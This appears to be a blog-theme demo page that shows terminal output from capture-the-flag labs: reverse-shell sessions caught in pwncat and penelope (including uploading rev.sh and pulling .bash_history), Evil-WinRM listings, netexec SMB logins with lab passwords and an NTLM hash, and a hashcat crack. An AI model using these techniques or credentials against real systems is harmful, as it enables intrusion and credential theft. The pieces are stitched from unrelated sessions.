┌──(root㉿kali)-[~/Desktop/hmv/otte]
└─# pwncat-cs -lp 1234
[01:15:41] Welcome to pwncat 🐈! __main__.py:164
[01:17:04] received connection from 192.168.56.27:44386 bind.py:84
[01:17:04] 192.168.56.27:44386: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@otte:/var/www/html$ whoami
www-date
┌──(root㉿kali)-[~/Desktop/htb/season8/certificate]
└─# penelope 4321
[+] Listening for reverse shells on 0.0.0.0:4321 → 127.0.0.1 • 192.168.8.3 • 192.168.3.4 • 172.17.0.1 • 172.19.0.1 • 172.22.0.1 • 172.20.0.1 • 172.21.0.1 • 172.18.0.1 • 10.10.16.30
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from DC01-10.10.11.71-Microsoft_Windows_Server_2019_Datacenter-x64-based_PC 😍️ Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D
[+] Logging to /root/.penelope/DC01~10.10.11.71_Microsoft_Windows_Server_2019_Datacenter_x64-based_PC/2025_06_24-05_12_05-481.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
PS C:\xampp\htdocs\certificate.htb\static\uploads\f74429cf2eca094d3d02e3c4f75bf684\she11> whoami
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/ubuntu~192.168.8.16-Linux-i686/2025_08_30-11_25_45-424.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────
root@ubuntu:/home/yu#
┌──(root㉿kali)-[~]
└─# pwncat-cs -lp 4455
/root/.local/share/uv/tools/pwncat-cs/lib/python3.10/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import iter_entry_points
[11:26:28] Welcome to pwncat 🐈! __main__.py:164
[11:26:47] received connection from 192.168.8.16:54724 bind.py:84
[11:26:48] 192.168.8.16:54724: registered new host w/ db manager.py:957
(local) pwncat$
(remote) yu@ubuntu:/home/yu$ whoami
yu
(remote) yu@ubuntu:/home/yu$ ls
CVE-2021-3156 Documents exploit.c metarget Public
CVE-2021-4034-main Downloads lzs.sh Music Templates
Desktop examples.desktop main Pictures Videos
(remote) yu@ubuntu:/home/yu$
(local) pwncat$ upload /rev.sh
./rev.sh ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 223/223 bytes • ? • 0:00:00
[11:27:28] uploaded 223.00B in 0.29 seconds upload.py:76
(local) pwncat$ download ./.bash_history
./.bash_history ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.8/1.8 KB • ? • 0:00:00
[11:27:44] downloaded 1.85KiB in 0.05 seconds download.py:71
(local) pwncat$
(local) pwncat$ [-] Session [3] died... We lost kali~192.168.8.18-Linux-x86_64 💔
2.7. ls
root@iZ2vc2qm1sftm37y9ewushZ:~# ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /bin/bash
total 66068
-rwxrwxrwx 1 root root 20554 Jul 31 00:08 d.sh
drwx------ 12 root root 4096 Aug 4 18:11 .
drwxr-xr-x 19 root root 4096 Jan 17 2025 ..
-rwxr-xr-x 1 root root 194 Apr 16 17:47 1125
-rw------- 1 root root 6597 Aug 6 20:06 .bash_history
-rw-r--r-- 1 root root 3106 Aug 4 18:10 .bashrc
drwx------ 3 root root 4096 Aug 1 18:58 .cache
drwx------ 4 root root 4096 Aug 1 18:58 .config
-rw-r--r-- 1 root root 20554 Jul 31 00:08 d.sh
-rwxr-xr-x 1 root root 369587 Aug 4 18:11 kejilion.sh
-rw-r--r-- 1 root root 10458985 Apr 11 14:23 kind-linux-amd64
-rw-r--r-- 1 root root 243570 Apr 11 14:23 kind-linux-arm64
drwxr-xr-x 3 root root 4096 Aug 1 18:31 .koishi
total 123456
drwxr-xr-x 2 root root 4096 Dec 15 10:30 .
drwxr-xr-x 15 root root 4096 Dec 15 10:30 ..
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 bash
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 cat
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 chmod
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 cp
-rwxr-xr-x 1 root root 7890 Dec 15 10:30 ls
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 mkdir
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 mv
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 rm
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 rmdir
-rwxr-xr-x 1 root root 7890 Dec 15 10:30 touch
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 vi
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 vim
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 nano
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 emacs
-rwxr-xr-x 1 root root 7890 Dec 15 10:30 grep
-rwxr-xr-x 1 root root 12345 Dec 15 10:30 sed
-rwxr-xr-x 1 root root 5678 Dec 15 10:30 awk
-rwxr-xr-x 1 root root 9012 Dec 15 10:30 sort
-rwxr-xr-x 1 root root 3456 Dec 15 10:30 uniq
2.8. evil-winrm & dir
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> dir
Directory: C:\Users\Sara.B\Documents\WS-01
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/4/2024 12:44 AM 530 Description.txt
-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap
PS C:\Users\Administrator\Desktop> Get-ChildItem -Force | Format-Table -AutoSize
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/15/2023 10:30 AM directory
-a---- 12/15/2023 10:30 AM 1234 archive.zip
-a---- 12/15/2023 10:30 AM 5678 backup.tar.gz
-a---- 12/15/2023 10:30 AM 9012 data.7z
-a---- 12/15/2023 10:30 AM 3456 music.mp3
-a---- 12/15/2023 10:30 AM 7890 video.mp4
C:\Users\Administrator\Downloads>dir
驱动器 C 中的卷是 Win10Pro X64
卷的序列号是 4E35-08B2
C:\Users\Administrator\Downloads 的目录
2025/08/30 18:23 <DIR> .
2025/08/30 18:23 <DIR> ..
2025/08/18 15:15 29,273 (2022级实习意向登记)上报视图-20250818.xlsx
2025/08/08 12:16 2,347,536 02-免杀逃逸 - 副本.pdf
2025/08/08 14:55 <DIR> 123
2025/07/29 22:57 325,576 20250729183317_haze-htb_rusthound-ce.zip
2025/07/30 09:34 392,276 20250729213352_haze-htb_rusthound-ce.zip
2.9. nxc
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# nxc smb htb.local -u henry.vinson -H hashe_lists
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
oxdf@hacky$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k --shares
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False) (signing:True) (signing:None) (channel binding:Never) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB frizzdc.frizz.htb 445 frizzdc [*] Enumerated shares
SMB frizzdc.frizz.htb 445 frizzdc Share Permissions Remark
SMB frizzdc.frizz.htb 445 frizzdc ----- ----------- ------
SMB frizzdc.frizz.htb 445 frizzdc ADMIN$ Remote Admin
SMB frizzdc.frizz.htb 445 frizzdc C$ Default share
SMB frizzdc.frizz.htb 445 frizzdc IPC$ READ Remote IPC
SMB frizzdc.frizz.htb 445 frizzdc NETLOGON READ Logon server share
SMB frizzdc.frizz.htb 445 frizzdc SYSVOL READ Logon server share
WINRM 10.10.11.39 5985 DC [+] university.htb\WAO:WebAO1337 (Pwn3d!)
#基本符号高亮
[*]
[!]
[+]
[-]
2.10. hashcat
$6$xyz$ZGQOqL77wiYAgPxsNEv2Kz3INjzK4JdG29RbaHaW5lrkH8bA8W7kC3GK4CctGrFO7.E2va7kSgF3eQXNWYQee.:reddragon
Session..........: hashcat
Status...........: Cracked
Status...........: Exhausted
.....: Cracked
......: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$xyz$ZGQOqL77wiYAgPxsNEv2Kz3INjzK4JdG29RbaHaW5lrk...WYQee.
Time.Started.....: Tue Dec 24 22:18:28 2024 (1 sec)
Time.Estimated...: Tue Dec 24 22:18:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 53686 H/s (14.63ms) @ Accel:1024 Loops:128 Thr:32 Vec:1
Speed.#2.........: 804 H/s (7.84ms) @ Accel:32 Loops:64 Thr:16 Vec:1
Speed.#*.........: 54490 H/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 32768/14344387 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 0/14344387 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:4800-4864
Candidate.Engine.: Device Generator
Candidates.#1....: diego -> keepout1
Candidates.#2....: 123456 -> fuckyou1
Hardware.Mon.#1..: Temp: 51c Util: 99% Core:2535MHz Mem:8000MHz Bus:8
Hardware.Mon.#2..: N/A
3. 脚注
这是一个脚注[2]
4. 文件下载
5. 代码背景高亮
>>>> def rabbit_sequence(n: int):
>>>> """计算前 n 项兔子数列(斐波那契数列)"""
>>>> seq = []
a, b = 1, 1
for _ in range(n):
seq.append(a)
a, b = b, a + b
return seq
if __name__ == "__main__":
n = int(input("请输入要计算的项数 n: "))
result = rabbit_sequence(n)
print(f"前 {n} 项兔子数列为:")
print(result)
ikun[3]
